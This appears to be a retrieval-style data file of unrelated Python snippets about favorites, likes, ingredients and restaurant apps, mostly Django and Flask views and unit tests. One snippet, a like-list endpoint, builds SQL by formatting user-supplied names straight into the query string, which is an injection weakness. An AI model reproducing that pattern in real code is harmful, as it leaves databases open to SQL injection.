session['user_id']\n\n already_favorited = check_testing_saved_location_in_favorites(user_id, test_id)\n\n if already_favorited:\n favorite['status'] = 'already_favorited'\n flash('Already saved to favorites.')\n return jsonify(favorite)\n\n else:\n favorite['status'] = 'added'\n saved_location = create_testing_saved_locations(user_id, test_id) \n location = get_testing_location_by_test_id(test_id)\n flash(f'Testing Location {location.alternate_name} saved to profile!')\n return jsonify(favorite)\n\n else:\n flash('Please login to save a location!')\n\n except Exception as e:\n msg = f\"Error. Tried adding {test_id} to db failed: \\n {e}.\"\n return jsonify(msg) \n\n return jsonify('Success!')", "def FoodCheckIn(sc, event):\n channel = sc.api_call('channels.info', channel=event['channel'])\n food = event['text'][9:]\n if food:\n if 'pizza' in food:\n sc.api_call('reactions.add', as_user='true', channel=event['channel'],\n timestamp=event['ts'], name='pizza')\n user = sc.api_call('users.info', user=event['user'])\n db = pymysql.connect(host='localhost', user='pizzabot', db='pizzachat')\n cursor = db.cursor()\n query = 'INSERT INTO foodlist (who, what) VALUES (%s, %s)'\n cursor.execute(query, (user['user']['name'], food.encode('utf-8')))\n db.commit()\n db.close()", "def test_user_own_recipes(self):\n\n recipe1 = Recipe(uri=\"testuri\", name=\"testname\", image_url=\"test_image_url\", user_id=self.uid)\n recipe2 = Recipe(uri=\"testuri2\", name=\"testname2\", image_url=\"test_image_url2\")\n\n db.session.add_all([recipe1, recipe2])\n db.session.commit()\n\n self.assertEqual(recipe1.user_id, self.uid)\n self.assertNotEqual(recipe2.user_id, self.uid)\n self.assertEqual(recipe2.user_id, None)", "def test_create_ingredient_successful(self):\n payload = {'name':'Cabbage'}\n self.client.post(INGREDIENTS_URL, payload)\n exists = Ingredient.objects.all().filter(user=self.user, name=payload['name']).exists\n self.assertTrue(exists)", "def test_add_remove_from_wishlist(self):\n url = reverse('add-to-wishlist')\n data = {\n 'igdb': self.game.igdb,\n 'name': self.game.name,\n 'slug': self.game.slug,\n 'cover_id': self.game.cover_id,\n 'backdrop_id': self.game.backdrop_id\n }\n\n add = self.client.post(url, data, format='json')\n self.assertEqual(True, add.data['value'])\n\n remove = self.client.post(url, data, format='json')\n self.assertEqual(False, remove.data['value'])", "def favorited(self: Article, request: Request):\n if not request.user:\n return False\n\n if self in request.user.favorites:\n return True\n\n return False", "def setUp(self):\n self.prod_1 = Product.objects.create(\n pk=1,\n ean='3350033118072',\n name='test 1',\n category='cat 1',\n image='product_default.png',\n nutriscore='u'\n )\n\n self.user_1 = User.objects.create_user(\n pk=1,\n username='Fav Models Unit Test 1',\n email='[email protected]'\n )\n\n self.fav_1 = Favourite.objects.create(\n pk=1,\n date_added='2019-12-20 09:00:00',\n user=self.user_1,\n product=self.prod_1\n )", "def favourite(self, favourite):\n\n self._favourite = favourite", "def add_fav_drinks(self, user_id, drinks): \n assert type(user_id) == str\n assert type(drinks) == list\n\n fav_drinks = self.get_fav_drinks(user_id)\n user_check = self.users.get_user_name(user_id)\n drinks_check = [self.drinks.get_drinks_by_flavor_and_type(d.get('flavor'), d.get('type')) for d in drinks]\n\n # make sure that at least one drink exists in the list\n if all(x is None for x in drinks_check):\n print(\"All drinks provided do not exist. We will not add favorite drinks since one of the drinks must already exist.\")\n \n # user does not exist\n elif user_check is None: \n print(\"User Id {} does not exist.\".format(user_id))\n \n # add fav drinks\n else : \n # user has existing fav drinks\n if fav_drinks is not None:\n for d in drinks:\n # add the drink if it does not exist \n drink_id = self.drinks.add_drink(d.get('type'), d.get('flavor'))\n fav_drinks.append(drink_id)\n # user has no existing fav drinks\n else :\n ids = []\n for d in drinks:\n # add the drink if it does not exist \n ids.append(self.drinks.add_drink(d.get('type'), d.get('flavor')))\n\n fd_id = self.__generate_id()\n self.favorite_drinks.append({\"id\": fd_id, \"user_id\": user_id, \"drink_id\": ids})", "def test_create_ingredient(self):\n\n ingredient_payload = {'name': 'Test Ingredient'}\n self.client.post(URL_INGREDIENTS, ingredient_payload)\n\n is_ingredient_created = Ingredient.objects.filter(\n user=self.user,\n name=ingredient_payload['name']\n ).exists()\n\n self.assertTrue(is_ingredient_created)", "def toggle_favorite(self, user, article, is_favoriting):\n if user not in article.favorited_by.all() and is_favoriting:\n article.favorited_by.add(user)\n if user in article.favorited_by.all() and not is_favoriting:\n article.favorited_by.remove(user)\n article.favoritesCount = article.favorited_by.all().count()\n article.save()", "def test_create_ingredient_successful(self):\n payload = {\n 'name': 'turmeric'\n }\n\n self.client.post(INGREDIENT_URL, payload)\n\n exists = Ingredients.objects.filter(\n user=self.user,\n name=payload['name']\n ).exists()\n\n self.assertTrue(exists)", "def added_by(self, user):\n return ChefsHasRecipes.objects.filter(recipe=self, chef=user).exists()", "def test_create_ingredient_succesfull(self):\n\n payload = {'name': 'Cabbage'}\n self.client.post(INGREDIENTS_URL, payload)\n\n exist = Ingredient.objects.filter(\n user=self.user,\n name=payload['name'],\n ).exists()\n self.assertTrue(exist)", "def test_new_flight_succeeds(self, init_db, new_flight):\n assert new_flight == new_flight.save()", "def set_favorite(request):\n company_id = request.data.get('id')\n company = Company.objects.get(id=company_id)\n\n request.user.profile.companies.add(company)\n return Response({'favorite': True})", "def create(self, validated_data):\n user_data = validated_data.pop('user')\n user = User.object.get(id=user_data.id)\n restaurant, created = Restaurant.objects.update_or_create(user=user, data=validated_data)\n return restaurant", "def update_favourites(self, item_info, status):\r\n if status == \"Add\":\r\n return self.model.add_to_favourites(item_info)\r\n elif status == \"Remove\":\r\n return self.model.delete_from_favourites(item_info)", "def add_fav_drink(self, user_id, drink_id):\n assert type(user_id) == str\n assert type(drink_id) == str \n\n existing_drink = False if self.drinks.get_drink_by_id(drink_id) is None else True\n existing_user = False if self.users.get_user_name(user_id) is None else True\n if not existing_drink:\n print(\"Drink does not exist.\")\n elif not existing_user:\n print(\"User does not exist.\")\n else :\n fav_drinks = self.get_fav_drinks(user_id)\n if fav_drinks is not None:\n if drink_id not in fav_drinks:\n fav_drinks.append(drink_id)\n else : # user exists but has no fav drinks\n fd_id = self.__generate_id()\n self.favorite_drinks.append({\"id\": fd_id, \"user_id\": user_id, \"drink_id\": [drink_id]})", "def test_create_ingredient_successful(self):\n payload = {'name': \"Test ingredient\"}\n\n # in order to create user must be already authenticated\n self.client.post(INGREDIENTS_URL, payload)\n\n exists = Ingredient.objects.filter(\n user=self.user,\n name=payload['name'],\n ).exists()\n\n self.assertTrue(exists)", "def test_update(self, init_db, favorite):\n params = {\n \"title\": \"Category\",\n \"description\": fake.alphanumeric(100),\n }\n favorite.update(**params)\n assert favorite.title == params['title']\n assert favorite.description == params['description']", "def mark_favorite(request, object_id):\n feed_item = get_object_or_404(FeedItem, id=object_id)\n fav_item, is_new = FavoriteItem.objects.get_or_create(feed_item=feed_item)\n if request.is_ajax():\n return JSONResponse({'status': 'ok', 'text': 'Marked as favorite'}, False)\n return redirect(request.META.get('HTTP_REFERER', 'feed_item_list'))", "def test_if_user_can_add_and_retrieve_data(self):\n # take the first three drinks\n drinks = self.test_data[\"drinks\"][:3]\n # create drink objects from the json data\n drinks = [Drink(**i) for i in drinks]\n Drink.objects.bulk_create(drinks)\n\n data = self.test_data[\"data\"][0]\n # use drink ids added to the db for this particular\n # test\n data[\"drink_id\"] = drinks[random.randint(0, 2)]._id\n\n response = self.client.post(\"/data/data_collected/\",\n data, format='json')\n\n # assert it data was added correctly\n self.assertEqual(response.status_code,\n status.HTTP_201_CREATED)\n\n # retrieve the data added\n response = self.client.get(\"/data/data_collected/\")\n\n # assert if the response is 200\n self.assertEqual(response.status_code, 200)\n\n # get the number of added data records\n data_added_count = len(response.json())\n\n # assert if the data added is one\n self.assertEqual(data_added_count, 1)", "def update_favorite_things():\n data = request.data\n favorite_things = json.loads(data)\n print(favorite_things)\n connection = mongo_connect()\n if(favorite_things[\"action\"] == \"add\"):\n connection[\"users\"].update_one(\n {\"_id\": ObjectId(session[\"_id\"])},\n {\"$push\": {\n favorite_things[\"type\"]: ObjectId(favorite_things[\"item_id\"])\n }\n }\n )\n else:\n connection[\"users\"].update_one(\n {\"_id\": ObjectId(session[\"_id\"])},\n {\"$pull\":\n {\n favorite_things[\"type\"]:\n ObjectId(favorite_things[\"item_id\"])\n }\n }\n )\n resp = jsonify(success=True)\n return resp", "def test_api_can_add_food_to_a_meal(self):\n response = self.client.post(f'/api/v1/meals/{self.breakfast.id}/foods/{self.oatmeal.id}')\n # import code; code.interact(local=dict(globals(), **locals()))\n\n self.assertEqual(response.data['message'], \"Successfully added oatmeal to breakfast\")", "def test_delete(self, init_db, favorite):\n favorite.delete()\n assert Favorite.get(favorite.id) == None", "def NewFood(r, foods):\n hasError = False\n for i in foods:\n try:\n food_form = FoodForm(i)\n if food_form.is_valid():\n food = food_form.save(commit=False)\n\n # store base64 type image into food.src\n if isBase64Image(i[\"src\"]):\n file = getImgContentFile(i[\"src\"])\n try:\n Image.open(file)\n food.src = file\n except IOError:\n print(\"Not a image.\")\n hasError = True\n food.restaurant = r\n food.save()\n else:\n hasError = True\n except:\n print(\"new error\")\n hasError = True\n return hasError", "def test_create_ingredient_successful(self):\n\n payload = {'name': 'Salt'}\n\n res = self.client.post(INGREDIENTS_URL, payload)\n\n exists = Ingredient.objects.filter(\n user=self.user,\n name=payload['name']\n ).exists()\n\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n self.assertTrue(exists)", "def saveUserFavorites(request, userid):\n try:\n User.objects.get(id=userid)\n newFavorite = FavoriteSerializer(data=request.data)\n print(request.data)\n if newFavorite.is_valid():\n try:\n Item.objects.get(id=request.data.get(\"item\"))\n newFavorite.save()\n return Response(newFavorite.data, status=status.HTTP_201_CREATED)\n \n except Item.DoesNotExist:\n fail = {\n \"Item\":\"doesnotexist\"\n }\n return JsonResponse(fail)\n \n #for testing ONLY\n print(newFavorite.errors)\n #f##########\n\n fail = {\n \"user\": \"requestdatanotvalid\",\n \"item\":\"requestdatanotvalid\"\n }\n return JsonResponse(fail)\n\n except User.DoesNotExist:\n fail = {\n \"user\":\"doesnotexist\"\n }\n return JsonResponse(fail)", "def test_view_url_propose_product_already_in_favorites(self):\r\n self.client.login(username='test', password='test')\r\n response = self.client.get(reverse('search_results'),\r\n {'query': '', 'name': 'nutella'})\r\n self.assertEqual(response.status_code, 200)\r\n self.assertTemplateUsed(response, 'purbeurre/search_results.html')", "def fav_place_check(uri):\n return veggiesailor.StorageFav().exists(uri)", "def test_given_a_user_when_I_add_a_todo_Then_I_can_access_it_from_user_todo_collection(self):\n from .models import Tag\n from .models import TodoUser\n from .models import TodoItem\n\n user = TodoUser(\n email=u'[email protected]',\n first_name=u'Arthur',\n last_name=u'Pendragon',\n )\n self.session.add(user)\n\n tags = [u'quest', u'ni', u'knight']\n\n todo = TodoItem(user.email,\n u'Find a shrubbery', \n [u'quest', u'ni', u'knight'] \n ) \n self.session.add(todo)\n \n user_todo = user.todo_list.one()\n self.assertTrue(todo is user_todo)", "def test_addUser(self):\n self.new_user.saveUser()\n self.assertEqual(len(User.users_list),1)", "def test_favs(app):\n res = app.get('/favs')\n assert res.status_code == 200\n assert b'bloom' in res.data", "def test_new_likes(self):\n\n new_user = User.signup(\"newuser\", \"[email protected]\", \"password123\", None)\n db.session.add(new_user)\n db.session.commit()\n\n new_msg = Message(text=\"A new message from a new user\", user_id=new_user.id)\n db.session.add(new_msg)\n db.session.commit()\n\n new_user.likes.append(new_msg)\n db.session.commit()\n\n likes = Likes.query.all()\n self.assertEqual(len(likes), 1)\n self.assertEqual(likes[0].user_id, new_user.id)\n self.assertEqual(likes[0].message_id, new_msg.id)", "def test_returns_projects_favourited_by_user_if_favourited_by_me_is_true(self):\n # Arrange\n # Make all projects to be accessible for user\n self.test_project_2.private = False\n self.test_project_2.save()\n self.test_project_3.status = ProjectStatus.PUBLISHED.value\n self.test_project_3.save()\n self.test_user.favorites = [self.test_project_1]\n self.test_user.save()\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"favoritedByMe\": \"true\"},\n )\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.json[\"results\"]), 1)\n self.assertEqual(\n response.json[\"results\"][0][\"projectId\"], self.test_project_1.id\n )", "def add_to_fav(request, q_id):\n if request.method == 'POST':\n Quotes.objects.add_to_user_fav(request.session['id'], q_id)\n return redirect('/quotes')", "def connect_user(self, user):\n\t\tis_user_added = False\n\t\tif not user in self.users.all():\n\t\t\tself.users.add(user)\n\t\t\tself.save()\n\t\t\tis_user_added = True\n\t\telif user in self.users.all():\n\t\t\tis_user_added = True\n\t\treturn is_user_added", "def favorite(self) -> bool:\n return self._favorite", "def post(self):\n # fetch parameter\n get_parser = reqparse.RequestParser(bundle_errors=True)\n get_parser.add_argument(\"user_id\", required=True, help=\"User ID required to ad to their favourite projects\")\n get_parser.add_argument(\"project_id\", required=True, help=\"Project ID required to add to the favourite projects\")\n args = get_parser.parse_args(strict=True)\n\n # get user_id and project_id\n user_id = args[\"user_id\"]\n project_id = args[\"project_id\"]\n\n # convert parameter ids into objectids\n try:\n user_id = ObjectId(user_id)\n project_id = ObjectId(project_id)\n except:\n return {\"message\": \"invalid user id or project id\"}, 400\n\n # add project to the user's favourites\n if ('user_id' or 'project_id') not in args.keys():\n return {\"message\": \"both user and project id are required\"}, 400\n else:\n # check if user is valid\n user = self.users.find_one({\"_id\": user_id})\n project = self.projects.find_one({\"_id\": project_id})\n if user is None:\n return {\"message\": \"user not found\"}, 404\n elif project is None:\n return {\"message\": \"project not found\"}, 404\n else:\n # add project to favourites\n user_favourites = self.favourites.find_one({\"user_id\": user_id})\n if user_favourites is None:\n # insert a new doc into favourites collection\n favourites_list = []\n favourites_list.append(deepcopy(project)) \n self.favourites.insert({\n \"user_id\": user_id,\n \"favourite_projects\": favourites_list\n })\n else:\n new_favourite_list = user_favourites[\"favourite_projects\"]\n\n # check if this project is already in the user's favourites\n for proj in new_favourite_list:\n if proj[\"_id\"] == project_id:\n return {\"message\": \"project is already in the favourites list\"}, 400\n\n new_favourite_list.append(deepcopy(project))\n updated_list = {\"favourite_projects\": new_favourite_list}\n\n self.favourites.update({\"user_id\": user_id}, {\"$set\": updated_list}, upsert=False)\n \n return {\"status\": \"project has been added to favourites successfully\"}, 200", "def save(self, substitute_choice, product_choice):\n self.db.query(f\"\"\"\n INSERT INTO {self.table} (substitut_id, original_id)\n VALUES (:substitut_id, :original_id)\n ON DUPLICATE KEY UPDATE substitut_id = :substitut_id\n \"\"\", substitut_id=substitute_choice.id, original_id=product_choice.id)\n favorite = (substitute_choice.id, product_choice.id)\n return favorite", "def test_add(self):\n # add a todo\n self.add(title=\"Sample task todo\", description=\"for sample\", state=\"todo\")\n task = Task.query.filter_by(title='Sample task todo').first()\n self.assertEqual(task.description, 'for sample')\n self.assertEqual(task.state, 'todo')\n\n # add a doing\n self.add(title=\"Sample task doing\", description=\"for sample\", state=\"doing\")\n task = Task.query.filter_by(title=\"Sample task doing\").first()\n self.assertEqual(task.description, 'for sample')\n self.assertEqual(task.state, 'doing')\n\n # add a done\n self.add(title=\"Sample task done\", description=\"for sample\", state=\"done\")\n task = Task.query.filter_by(title='Sample task done').first()\n self.assertEqual(task.description, 'for sample')\n self.assertEqual(task.state, 'done')", "def favorite(request, movie_id):\n\n movie = get_object_or_404(Movie, pk=movie_id)\n try:\n if movie.liked:\n movie.liked = False\n else:\n movie.liked = True\n movie.save()\n except (KeyError, Movie.DoesNotExist):\n return JsonResponse({'success': False})\n else:\n return JsonResponse({'success': True})", "def saving_search(request, id_movie):\n movie = Movie.objects.get(id_code=id_movie)\n Favorite.objects.get_or_create(user_link=request.user,\n movie_saved=movie)\n return redirect('home')", "def test_save_users(self):\n\n self.new_users.save_users() # saving the new user\n self.assertEqual(len(User.user_list), 1)", "def favorite(self, favorite: bool):\n if favorite is None:\n raise ValueError(\"Invalid value for `favorite`, must not be `None`\")\n\n self._favorite = favorite", "def post_favorite(request, pk=None):\n post = Post.objects.get(pk=pk).original_or_self()\n if post.favorites.filter(pk=request.user.pk).exists():\n post.favorites.remove(request.user)\n else:\n post.favorites.add(request.user)\n post.save()\n\n referer = request.META['HTTP_REFERER']\n if referer:\n return redirect(referer)\n else:\n return redirect('posts:post', pk=post.pk)", "def restaurants_new():\n # If the user isn't logged in, send to the login page\n if helper.handle_login(login_session) is False:\n return redirect('/login')\n\n if request.method == 'POST':\n if len(request.form['name']) > 0:\n new_restaurant = Restaurant(name=request.form['name'],\n address=request.form['address'],\n phone=request.form['phone'],\n web=helper.check_restaurant_URL(request.form['web']),\n description=request.form['description'],\n user_id=login_session['user_id'])\n session.add(new_restaurant)\n session.commit()\n flash(\"New restaurant created - {}\".format(new_restaurant.name))\n tag_line = request.form['tag_line']\n tag_list = tag_line.split(',')\n for tag in tag_list:\n helper.add_tag_if_not_exists(tag, new_restaurant.id)\n return redirect(url_for('restaurants_page'))\n else:\n flash(\"Incorrect Restaurant details - Please include a name!\")\n\n user_info = helper.get_user_if_exists(login_session)\n return render_template('newrestaurant.html', user_info=user_info)", "def test_get_and_set_star(self):\n email = '[email protected]'\n feature_id = self.feature_1.key.integer_id()\n notifier.FeatureStar.set_star(email, feature_id)\n actual = notifier.FeatureStar.get_star(email, feature_id)\n self.assertEqual(email, actual.email)\n self.assertEqual(feature_id, actual.feature_id)\n self.assertTrue(actual.starred)\n updated_feature = models.Feature.get_by_id(feature_id)\n self.assertEqual(1, updated_feature.star_count)\n\n notifier.FeatureStar.set_star(email, feature_id, starred=False)\n actual = notifier.FeatureStar.get_star(email, feature_id)\n self.assertEqual(email, actual.email)\n self.assertEqual(feature_id, actual.feature_id)\n self.assertFalse(actual.starred)\n updated_feature = models.Feature.get_by_id(feature_id)\n self.assertEqual(0, updated_feature.star_count)", "def test_save(self):\n self.assertEqual(CalendallUser.objects.count(), len(self.data))", "def test_favorites_posts(self):\n self.resource._request.register_uri(\n 'GET', '/users/dotzero/favorites/posts?page=2', 'fixture_post.json')\n\n response = self.resource.favorites_posts('dotzero', 2)\n\n self.assertTrue('data' in response)\n self.assertTrue('server_time' in response)", "def test_create_shelf(self, *_):\n form = forms.ShelfForm()\n form.data[\"user\"] = self.local_user.id\n form.data[\"name\"] = \"new shelf name\"\n form.data[\"description\"] = \"desc\"\n form.data[\"privacy\"] = \"unlisted\"\n request = self.factory.post(\"\", form.data)\n request.user = self.local_user\n\n views.create_shelf(request)\n\n shelf = models.Shelf.objects.get(name=\"new shelf name\")\n self.assertEqual(shelf.privacy, \"unlisted\")\n self.assertEqual(shelf.description, \"desc\")\n self.assertEqual(shelf.user, self.local_user)", "def add_favourites_field():\n existing = read_json()\n\n if 'favourites' not in existing[0].keys(): # if the field has not already been added, add it.\n for club in existing:\n club['favourites'] = 0\n write_json(existing)", "def accept(self):\n receiver_friend_list = FriendList.objects.filter(user_id=self.receiver_id)\n sender_friend_list = FriendList.objects.filter(user_id=self.sender_id)\n if(receiver_friend_list.exists()):\n receiver_friend_list = receiver_friend_list[0]\n else:\n receiver_friend_list = FriendList.objects.create(user_id=self.receiver_id)\n\n if(sender_friend_list.exists()):\n sender_friend_list = sender_friend_list[0]\n else:\n sender_friend_list = FriendList.objects.create(user_id=self.sender_id)\n\n if receiver_friend_list:\n receiver_friend_list.add_friend(self.sender_id)\n if sender_friend_list:\n sender_friend_list.add_friend(self.receiver_id)\n self.is_active = False\n self.save()", "def test_add_or_remove_like_from_db(self):\n session = UnifiedAlchemyMagicMock()\n with mock.patch(\"app.DB.session\", session):\n app.add_or_remove_like_from_db(\"username\", 0)\n is_liked = (\n session.query(app.models.Likes.id)\n .filter_by(username=\"username\", post_id=0)\n .scalar()\n is not None\n )\n session.commit()\n self.assertEqual(is_liked, True)", "def test_update_restaurant(self):\n from espresso import db\n from espresso import Restaurant\n\n name = 'Restaurant Mexicano'\n zip_code = \"94110\"\n db.session.add(Restaurant(name=name, creator='[email protected]', zip_code=zip_code))\n db.session.commit()\n\n headers = {'Content-Type': 'application/json'}\n headers.update(auth_header_cru_restaurants)\n website = 'www.mexicano-nj.com'\n email = '[email protected]'\n info = {'website': website, 'email': email}\n resp = self.test_client.put(self.API_BASE + '/1', headers=headers, data=json.dumps(info))\n\n self.assertEqual(resp.status_code, 200)\n resp_dict = json.loads(resp.data)\n self.assertEqual(resp_dict['id'], 1)\n self.assertTrue(name in resp_dict['message'])\n\n # Check that all restaurant fields are returned.\n self.assertTrue('restaurant' in resp_dict)\n self.assertEqual(resp_dict['restaurant']['id'], 1)\n self.assertEqual(resp_dict['restaurant']['website'], website)\n self.assertEqual(resp_dict['restaurant']['email'], email)\n self.assertEqual(resp_dict['restaurant']['zip_code'], zip_code)\n\n self.assertTrue('name' in resp_dict['restaurant'])\n self.assertTrue('street' in resp_dict['restaurant'])\n self.assertTrue('suite' in resp_dict['restaurant'])\n self.assertTrue('city' in resp_dict['restaurant'])\n self.assertTrue('state' in resp_dict['restaurant'])\n self.assertTrue('phone_num' in resp_dict['restaurant'])\n self.assertTrue('date_established' in resp_dict['restaurant'])\n self.assertTrue('creator' in resp_dict['restaurant'])\n\n # -----------------------------\n # Make a separate request to retrieve the restaurant and assert that updated fields are as intended\n resp = self.test_client.get(self.API_BASE + '/1', headers=auth_header_cru_restaurants)\n\n self.assertEqual(resp.status_code, 200)\n resp_dict = json.loads(resp.data)\n self.assertEqual(resp_dict['restaurant']['id'], 1)\n self.assertEqual(resp_dict['restaurant']['website'], website)\n self.assertEqual(resp_dict['restaurant']['email'], email)\n self.assertEqual(resp_dict['restaurant']['zip_code'], zip_code) # Make sure this has not changed", "def test_like_message(self):\n\n self.u.likes.append(self.m_u2)\n db.session.commit()\n\n self.assertEqual(len(self.u.likes), 1)\n self.assertEqual(self.u.likes[0], self.m_u2)", "def test_create_pizza(self):\n url = reverse('pizzas-list')\n data = {'name': 'Quattro Formaggio'}\n response = self.client.post(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(Pizza.objects.count(), 1)\n self.assertEqual(Pizza.objects.get().name, 'Quattro Formaggio')", "def test_add(self):\n r = main.List.connection()\n main.List.add(r, \"ToDo\", 1, \"Buy apples\", 2, \"20.05.2015\")\n task = r.get(\"ToDo\")\n self.assertTrue(task, \"No such entry in DB. Adding failed.\")", "def SetNewFav(self, newFav):\n self.favouriteFood = newFav", "def save(self, *args, **kwargs):\n if not self.require_confirm_email:\n User.objects.filter(is_active=False, deactivation_reason=\"pending\").update(\n is_active=True, deactivation_reason=None\n )\n if not self.invite_question_text:\n self.invite_question_text = \"What is your favourite book?\"\n super().save(*args, **kwargs)", "def test_check_add_flavor(self):\n for flavor_id, flavor in OPENSTACK_FLAVOR.items():\n self.cmd._add_flavor(flavor, flavor_id)\n ralph_flavor = CloudFlavor.objects.get(flavor_id=flavor_id)\n self.assertEqual(ralph_flavor.name, flavor['name'])\n self.assertEqual(ralph_flavor.cloudprovider, self.cloud_provider)\n self.assertIn(flavor['tag'], ralph_flavor.tags.names())\n self.assertEqual(flavor['cores'], ralph_flavor.cores)\n self.assertEqual(flavor['memory'], ralph_flavor.memory)\n self.assertEqual(flavor['disk'], ralph_flavor.disk)", "def add_restaurant_review():\n username = sign_up.get_username()\n if username:\n add_var = dict(user=username, restaurant_name=\"\", restaurant_address=\"\",\n restaurant_item=\"\", item_comments=\"\", item_price=\"\",\n restaurant_ranking=\"\", restaurant_rating=\"\",\n restaurant_rating_reason=\"\", address=\"\", restaurant_chosen=\"\",\n address_chosen=\"\")\n return bottle.template('add_review', add_var=add_var)\n else:\n return bottle.template('login',\n dict(user_error=\"Sorry, you need to be logged in to submit a review, please log below:\", pw_error=\"\"))", "def post(self):\n args = UpdateLikeList.post_parser.parse_args()\n user_name = args.get('user_name')\n restaurant_name = args.get('restaurant_name')\n #rating = args.get('rating')\n newlike = {\n 'user_name':args.get('user_name'),\n 'restaurant_name':args.get('restaurant_name')\n #'rating':args.get('rating')\n }\n conn = db.create_connection(db.connection_config_dict)\n cursor = conn.cursor()\n\n # To get user's user_id\n user_id = []\n sql_1 = 'SELECT user_id FROM User WHERE user_name = \"{user_name}\"'.format(user_name=user_name)\n print(sql_1)\n cursor.execute(sql_1)\n for u in cursor:\n user_id.append(u)\n print(user_id) \n\n # To get restaurant's restaurant_id\n restaurant_id = []\n sql_2 = 'SELECT restaurant_id FROM Restaurant WHERE name = \"{restaurant_name}\"'.format(restaurant_name=restaurant_name)\n print(sql_2)\n cursor.execute(sql_2)\n for u in cursor:\n restaurant_id.append(u)\n print(restaurant_id)\n\n # Insert new restaurant into LikeList table\n # neo4j may need insert data here\n # user id is user_id[0][0], restaurant id is restaurant_id[0][0].\n sql_3 = \"INSERT INTO LikeList (user_id, restaurant_id) VALUES ({user_id}, {restaurant_id});\".format(user_id=user_id[0][0], restaurant_id=restaurant_id[0][0])\n print(sql_3)\n cursor.execute(sql_3)\n\n conn.commit()\n return newlike, 201", "def test_create_recipe_with_ingredient(self):\n ingredient1 = sample_ingredient(user=self.user, name='Prawns')\n ingrident2 = sample_ingredient(user=self.user, name ='Ginger')\n\n payload = {\n 'title': 'Thai prawn and curry',\n 'ingredient': [ingredient1.id,ingrident2.id],\n 'time_minuts':60,\n 'price': 250\n }\n res = self.client.post(RECIPE_URL,payload)\n\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n\n recipe = Recipe.objects.get(id=res.data['id'])\n ingredients = recipe.ingredient.all()\n self.assertEqual(ingredients.count(),2)\n self.assertIn(ingredient1, ingredients)\n self.assertIn(ingrident2,ingredients)", "def count_favorite(self, obj):\n\n return obj.recipe_fav.count()", "def test_func(self):\n return (Student.objects.filter(user=self.request.user).exists())", "def test_create_like(self):\n pokemon = Pokemon.objects.all().first()\n r = self.client.post(\n reverse('create_like'),\n {'pokemon-like-id': pokemon.id},\n HTTP_X_REQUESTED_WITH='XMLHttpRequest'\n )\n\n self.assertEqual(Like.objects.all().count(), 1)", "def test_is_following(self):\n\n self.u1.following.append(self.u2)\n db.session.commit()\n\n self.assertTrue(self.u1.is_following(self.u2))\n self.assertFalse(self.u2.is_following(self.u1))", "def test_is_followed_by(self):\n\n self.u1.followers.append(self.u2)\n db.session.commit()\n\n self.assertTrue(self.u1.is_followed_by(self.u2))\n self.assertFalse(self.u2.is_followed_by(self.u1))", "def test_save_user(self):\n self.new_user.save_user()\n self.assertEqual(len(User.user_list), 1)", "def test_save_user(self):\n self.new_user.save_user()\n self.assertEqual(len(User.user_list), 1)", "def test_ingredients_limited_to_user(self):\n\n user2 = get_user_model().objects.create_user(\n '[email protected]',\n 'zohaib123'\n )\n Ingredients.objects.create(user=user2, name='Vinegar')\n\n ingredient = Ingredients.objects.create(\n user=self.user, name=\"Turmeric\"\n )\n res = self.client.get(INGREDIENT_URL)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data[0]['name'], ingredient.name)", "def test_get_restaurant_by_id(self):\n from espresso import db\n from espresso import Restaurant\n\n name = 'Restaurant Greco'\n db.session.add(Restaurant(name=name, creator='[email protected]'))\n db.session.commit()\n\n # Since this is a freshly created table, the first id should be 1\n resp = self.test_client.get(self.API_BASE + '/1', headers=auth_header_cru_restaurants)\n self.assertEqual(resp.status_code, 200)\n resp_dict = json.loads(resp.data)\n self.assertEqual(resp_dict['restaurant']['name'], name)", "def test_get_is_book_on_shelf(self, *_):\n shelf = self.local_user.shelf_set.first()\n self.assertFalse(shelf_tags.get_is_book_on_shelf(self.book, shelf))\n models.ShelfBook.objects.create(\n shelf=shelf, book=self.book, user=self.local_user\n )\n self.assertTrue(shelf_tags.get_is_book_on_shelf(self.book, shelf))", "def add_user_to_db(json_details):\n return True", "def newMenuItem(restaurant_id):\n\n if 'access_token' not in flask_session:\n return logInRedirect()\n restaurant = session.query(Restaurant).filter_by(id = restaurant_id).first()\n user_id = getUserId(flask_session['email'],flask_session['google_plus_id'])\n if not restaurant.user_id == user_id:\n flash(\"Only restaurant owners can add new items.\")\n return redirect(url_for(\"publicMenu\",restaurant_id = restaurant_id))\n\n if request.method == \"POST\":\n new_name = request.form['new_name']\n print \"\\nnewMenuItem POST triggered, name is: \", new_name\n newMenuItem = MenuItem( name=new_name,\n restaurant_id=restaurant.id )\n session.add(newMenuItem)\n session.commit()\n flash( \"new item '\" + new_name + \"' created!\")\n print \"POST worked!\"\n return redirect(url_for(\"showMenu\", restaurant_id=restaurant.id))\n\n else:\n return render_template('newMenuItem.html', restaurant = restaurant)", "def test_get_feature_starrers__some_starrers(self):\n app_user_1 = models.AppUser(email='[email protected]')\n app_user_1.put()\n app_user_2 = models.AppUser(email='[email protected]')\n app_user_2.put()\n feature_1_id = self.feature_1.key.integer_id()\n notifier.FeatureStar.set_star(app_user_1.email, feature_1_id)\n notifier.FeatureStar.set_star(app_user_2.email, feature_1_id)\n\n actual = notifier.FeatureStar.get_feature_starrers(feature_1_id)\n self.assertItemsEqual(\n [app_user_1.email, app_user_2.email],\n [au.email for au in actual])", "def test_user_retrieve_restaurant(self):\n response = self.client.get(f'/api/places/1/', format='json')\n self.assertNotEqual(response.status_code, status.HTTP_403_FORBIDDEN)", "def test_update_restaurant_blank_name(self):\n from espresso import db\n from espresso import Restaurant\n\n name = 'Restaurant Mexicano'\n db.session.add(Restaurant(name=name, creator='[email protected]'))\n db.session.commit()\n\n headers = {'Content-Type': 'application/json'}\n headers.update(auth_header_cru_restaurants)\n info = {'name': ''}\n resp = self.test_client.put(self.API_BASE + '/1', headers=headers, data=json.dumps(info))\n self.assertEqual(resp.status_code, 400)", "def post(self, request, slug):\n try:\n article = Article.objects.get(slug=slug)\n except Article.DoesNotExist:\n return Response({\"Message\": [\n \"That article does not exist\"\n ]}, status.HTTP_204_NO_CONTENT)\n favorite = dict()\n 